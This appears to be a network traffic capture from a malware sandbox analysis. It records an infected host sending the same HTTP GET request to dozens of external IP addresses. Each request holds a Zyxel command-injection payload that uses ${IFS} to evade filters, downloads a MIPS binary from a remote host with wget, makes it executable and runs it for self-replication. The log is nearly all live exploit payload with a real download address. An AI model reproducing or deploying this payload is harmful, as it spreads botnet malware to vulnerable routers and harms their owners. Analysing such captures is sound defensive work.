                                        Jan 14, 2024 16:18:52.635656118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6373192.168.2.1348484100.32.251.156443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.635727882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6374192.168.2.1344844203.128.9.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.635761023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6375192.168.2.1340578192.96.159.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.635796070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6376192.168.2.133538231.162.43.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.635867119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6377192.168.2.1337598182.39.174.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.635878086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6378192.168.2.133916489.169.192.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.635912895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6379192.168.2.1348114111.83.227.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.635943890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6380192.168.2.1347434213.220.206.176443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.635983944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6381192.168.2.13544689.145.118.150443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.636020899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6382192.168.2.1339914198.62.236.212443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.636058092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6383192.168.2.1341100108.188.30.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.636081934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6384192.168.2.135934478.149.51.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.636120081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6385192.168.2.134886862.161.120.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.636181116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6386192.168.2.134173613.149.206.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.636213064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6387192.168.2.133413691.81.161.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.636248112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6388192.168.2.135779636.183.37.97443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.636296034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6389192.168.2.1353822218.192.94.244443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.636337042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6390192.168.2.1336114112.14.245.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.636372089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6391192.168.2.1344772124.15.229.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.636440039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6392192.168.2.135140697.20.220.214443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.636485100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6393192.168.2.133699293.127.137.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.636514902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6394192.168.2.1356556174.214.172.97443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.636579990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6395192.168.2.1355748123.234.106.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.636607885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6396192.168.2.1335262114.232.135.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.636643887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6397192.168.2.135655485.71.164.67443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.636708975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6398192.168.2.1349434179.47.119.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.636734962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6399192.168.2.135284883.64.217.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.636768103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6400192.168.2.135327836.40.78.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.636827946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6401192.168.2.1351788199.179.163.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.636862040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6402192.168.2.1354096161.158.17.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.636913061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6403192.168.2.1339126192.177.240.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.636950016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6404192.168.2.1349314173.104.120.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.637007952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6405192.168.2.1352978212.39.237.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.637061119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6406192.168.2.1352606109.100.99.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.637111902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6407192.168.2.1350786176.189.80.12443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.637136936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6408192.168.2.1343836118.66.30.249443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.637192011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6409192.168.2.133744273.252.153.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.637223959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6410192.168.2.135469850.0.162.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.637254953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6411192.168.2.133632868.253.62.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.637316942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6412192.168.2.1337938195.63.181.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.637341022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6413192.168.2.135216062.79.189.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.637367010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6414192.168.2.1345784153.78.216.144443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.637413979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6415192.168.2.1357268156.134.20.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.637439013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6416192.168.2.133767299.255.143.236443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.637465954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6417192.168.2.1342224105.6.137.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.637517929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6418192.168.2.1349012168.229.94.211443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.637572050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6419192.168.2.134568267.69.198.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.637608051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6420192.168.2.1346560171.98.211.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.637639999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6421192.168.2.1358122221.80.185.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.637691975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6422192.168.2.1354000118.248.209.194443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.637739897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6423192.168.2.1338552125.93.46.194443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.637773991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6424192.168.2.1349796142.111.196.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.637823105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6425192.168.2.135091651.21.29.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.637842894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6426192.168.2.135081431.127.218.214443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.637883902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6427192.168.2.1340694159.35.89.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.637944937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6428192.168.2.133417847.18.129.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.637944937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6429192.168.2.1333448211.25.177.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.637996912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6430192.168.2.1351546207.47.174.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.638046026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6431192.168.2.1343470206.180.145.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.638071060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6432192.168.2.13588121.164.77.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.638108969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6433192.168.2.1360954197.89.102.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.638147116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6434192.168.2.134157625.250.237.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.638183117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6435192.168.2.135550486.126.187.134443
                                        TimestampBytes transferredDirectionData
